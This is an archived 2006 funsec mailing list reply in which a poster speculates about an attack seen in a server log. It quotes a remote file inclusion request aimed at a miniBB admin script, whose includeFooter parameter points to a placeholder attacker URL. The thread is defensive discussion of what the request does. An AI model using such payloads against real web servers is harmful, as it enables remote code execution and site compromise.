funsec mailing list archives
Re: interesting attack
From: Technocrat <dj.technocrat.listmail () gmail com>
Date: Wed, 19 Apr 2006 12:33:05 -0500
On 4/14/06, Peter Kosinar <goober () nuf ksp sk> wrote:
GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1
Without researching it, I would guess that it is a command/script injection attack in a PHP based BB system. Looks like she is using a poor file handler for the injection. Again, this is without research. -Technocrat _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- interesting attack Henderson, Dennis K. (Apr 14)
- Re: interesting attack Anthony Rodgers (Apr 16)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)